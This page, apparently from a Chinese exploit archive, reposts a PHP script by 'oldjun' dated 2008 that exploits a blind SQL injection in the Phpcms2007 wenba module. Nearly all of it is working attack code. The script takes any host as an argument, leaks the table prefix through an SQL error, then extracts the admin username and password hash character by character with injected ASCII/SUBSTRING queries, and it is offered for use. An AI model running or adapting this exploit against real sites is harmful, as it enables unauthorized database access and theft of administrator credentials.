首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PhpCms2007 sp6 SQL injection 0day (wenba)
来源:http://www.oldjun.com 作者:oldjun 发布时间:2008-11-10  
<?
print_r
(
'
--------------------------------------------------------------------------------
Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit
BY oldjun[S.U.S](http://www.oldjun.com)
--------------------------------------------------------------------------------
'
);
if (
$argc<3
) {
print_r(
'
--------------------------------------------------------------------------------
Usage: php '
.$argv[0].
' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '
.$argv[0].
' localhost /
--------------------------------------------------------------------------------
'
);
die;
}

function 
sendpacketii($packet
)
{
global  
$host$html
;
$ock=fsockopen(gethostbyname($host),'80'
);
if (!
$ock
) {
echo 
'No response from '.$host
; die;
}
fputs($ock,$packet
);
$html=''
;
while (!
feof($ock
)) {
$html.=fgets($ock
);
}
fclose($ock
);
}

$host=$argv[1
];
$path=$argv[2
];
$prefix="phpcms_"
;
$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2"
;

if ((
$path[0]<>'/') or ($path[strlen($path)-1]<>'/'
))
{echo 
"Error... check the path!\r\n\r\n"
; die;}

/*get   $prefix*/
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\r\n"
;
$packet.="Host: ".$host."\r\n"
;
$packet.="Cookie: ".$cookie."\r\n"
;
$packet.="Connection: Close\r\n\r\n"
;
sendpacketii($packet
);
//echo $html;
if (eregi("in your SQL syntax",$html
))
{
$temp=explode("FROM ",$html
);
if(isset(
$temp[1])){$temp2=explode("wenba_answer",$temp[1
]);}
if(
$temp2[0
])
$prefix=$temp2[0
];
echo 
"[+]prefix -> ".$prefix."\r\n"
;
}
echo 
"[~]exploting now,plz waiting...\r\n\r\n"
;

$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\r\n"
;
$packet.="Host: ".$host."\r\n"
;
$packet.="Connection: Close\r\n\r\n"
;
sendpacketii($packet
);
if (
eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\r\n\r\n"
; die;}

$chars[0]=0;
//null
$chars=array_merge($chars,range(48,57)); 
//numbers
$chars=array_merge($chars,range(97,102));
//a-f letters
$j=1;$password=""
;
while (!
strstr($password,chr(0
)))
{
for (
$i=0$i<=255$i
++)
{
if (
in_array($i,$chars
))
{
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n"
;
$packet.="Host: ".$host."\r\n"
;
$packet.="Connection: Close\r\n\r\n"
;
sendpacketii($packet
);
if (!
eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n"
;break;}
}
if (
$i==255) {die("Exploit failed..."
);}
}
$j
++;
}

$j=1;$username=""
;
while (!
strstr($username,chr(0
)))
{
for (
$i=0$i<=255$i
++)
{
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n"
;
$packet.="Host: ".$host."\r\n"
;
$packet.="Connection: Close\r\n\r\n"
;
sendpacketii($packet
);
if (!
eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."\r\n"
;break;}
if (
$i==255) {die("Exploit failed..."
);}
}
$j
++;
}
print_r(
'
--------------------------------------------------------------------------------
[+]username -> '
.$username.
'
[+]password(md5 32λ) -> '
.$password.
'
--------------------------------------------------------------------------------
'
);
function 
is_hash($hash
)
{
if (
ereg("^[a-f0-9]{32}",trim($hash))) {return true
;}
else {return 
false
;}
}
if (
is_hash($password)) {echo "Exploit succeeded..."
;}
else {echo 
"Exploit failed..."
;}
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ooVoo 1.7.1.35 (URL Protocol)
·smcFanControl 2.1.2 Multiple B
·Linux Kernel < 2.4.36.9/2.6.27
·Mambo Component n-form (form_i
·Castle Rock Computing SNMPc <
·MemHT Portal <= 4.0 Remote Cod
·Net-SNMP <= 5.1.4/5.2.4/5.4.1
·GE Proficy Real Time Informati
·MS Windows Server Service Code
·VLC Media Player < 0.9.6 .RT S
·e-Vision CMS <= 2.0.2 Multiple
·MemHT Portal 4.0.1 SQL Injecti
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved